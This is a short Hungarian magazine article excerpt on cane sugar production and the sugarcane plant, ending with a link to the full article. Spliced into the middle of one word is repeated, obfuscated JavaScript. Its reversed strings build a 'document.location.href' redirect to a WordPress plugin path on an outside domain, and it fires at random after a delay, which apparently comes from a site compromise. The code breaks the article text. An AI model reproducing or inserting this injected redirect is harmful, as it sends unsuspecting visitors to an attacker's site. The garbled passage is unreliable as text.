A cukornádból a bepárlási és mosási technológiai lépések számától függően barna és fehér nádcukor is készíthető. A barna nádcukor nem tévesztendő össze a barnacukorral, ami leggyakrabban cukorrépából nyert fehér cukorból készül, a cukorgyártás során visszamaradt oldott nádmelasz hozzáadásával.. Ezzel ellentétben a barna nádcukor a cukornád kipréselt, cukros levéből tisztítás után kikristályosítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott termék, ahol az a cél, hogy a melasz tartalom egy része megmaradjon. A cukornád évelő trópusi növény, magassága 2-5 métert is elérheti. Beérésére levelei nagy részben leszáradnak, de néhol maradhat egy-két zöld levele is. Emiatt, valamint a szárát borító viaszréteg eltávolítása érdekében a földet aratás előtt sok esetben leégetik,…
A cikk folytatódik: http://szeniormagazin.co.hu/eletmod/2018/01/11/hogyan-keszul-a-teascseszenkbe-kerulo-cukor-.html
- Hirdetés -